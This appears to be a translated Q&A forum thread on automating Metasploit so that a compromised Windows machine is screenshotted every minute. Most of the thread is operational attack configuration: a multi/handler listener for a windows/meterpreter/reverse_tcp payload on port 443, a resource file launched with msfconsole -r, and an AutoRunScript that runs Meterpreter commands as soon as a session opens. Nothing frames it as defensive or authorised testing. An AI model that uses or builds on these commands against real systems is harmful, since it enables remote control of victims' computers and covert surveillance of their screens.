2017-07-30 90 views
0

我想每分鐘自動運行metrpreter命令,不幸的是我沒有足夠的編程技巧來編寫bash腳本或python。 比如我想自動做這些:自動運行metasploit然後meterpreter命令

msfconsole 
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST x.x.x.x 
set LPORT 443 
exploit 
Meterpreter session 1 opened 
meterpreter > screenshot 

實際上採取截圖自動每分鐘

回答

0

我們可以listener.rc

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST x.x.x.x 
set LPORT 443 
exploit -j -z 

並運行:

msfconsole -r〜/ listener.rc

但是如何添加meterpreter命令?

0

這樣做

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST x.x.x.x 
set LPORT 443 
set AutoRunScript multi_console_command -rc commands.rc 
exploit -j -z 

雖然commands.rc把你Meterpreter就會命令,每行

+0

+1 @指定Rashwanov.This運行Meterpreter就會命令一次,但我想這樣做(重複)命令對應這樣一個就像每分鐘自動截圖一樣。 – jali316